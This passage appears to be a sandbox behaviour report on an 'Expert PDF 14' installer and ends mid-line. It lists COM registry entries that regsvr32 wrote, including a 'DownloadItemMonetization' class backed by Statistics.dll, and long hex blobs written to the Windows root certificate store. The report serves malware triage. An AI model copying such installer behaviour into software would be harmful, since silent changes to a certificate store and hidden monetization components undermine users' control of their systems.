| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA738FC0-B58C-4717-BF65-F2034D0ABC09}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F0943358-2D26-4A19-A9DF-C949F475DDE3} | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\ = "DownloadItemMonetization Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 